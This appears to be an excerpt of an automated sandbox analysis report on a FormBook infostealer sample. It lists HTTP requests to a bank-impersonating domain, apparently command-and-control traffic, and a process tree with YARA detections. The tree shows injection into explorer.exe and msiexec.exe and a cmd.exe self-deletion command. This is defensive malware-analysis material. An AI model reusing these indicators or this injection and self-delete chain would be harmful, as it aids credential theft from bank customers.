                                    Aug 8, 2022 17:54:35.407283068 CEST9537OUTGET /zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp HTTP/1.1
                                    Host: www.secure-id6793-chase.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Aug 8, 2022 17:54:36.387742043 CEST9629OUTGET /zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp HTTP/1.1
                                    Host: www.secure-id6793-chase.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Click to jump to process

                                    Target ID:0
                                    Start time:17:52:29
                                    Start date:08/08/2022
                                    Path:C:\Users\user\Desktop\0098764345678.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\0098764345678.exe"
                                    Imagebase:0x2e0000
                                    File size:834560 bytes
                                    MD5 hash:69EC82C711ED34399013471E214A7E64
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Target ID:4
                                    Start time:17:52:40
                                    Start date:08/08/2022
                                    Path:C:\Users\user\Desktop\0098764345678.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0x8c0000
                                    File size:834560 bytes
                                    MD5 hash:69EC82C711ED34399013471E214A7E64
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Target ID:7
                                    Start time:17:52:48
                                    Start date:08/08/2022
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff6b8cf0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Target ID:18
                                    Start time:17:53:35
                                    Start date:08/08/2022
                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                    Imagebase:0x1130000
                                    File size:59904 bytes
                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Target ID:19
                                    Start time:17:53:40
                                    Start date:08/08/2022
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\0098764345678.exe"
                                    Imagebase:0xc20000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:20
                                    Start time:17:53:44
                                    Start date:08/08/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7c9170000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    No disassembly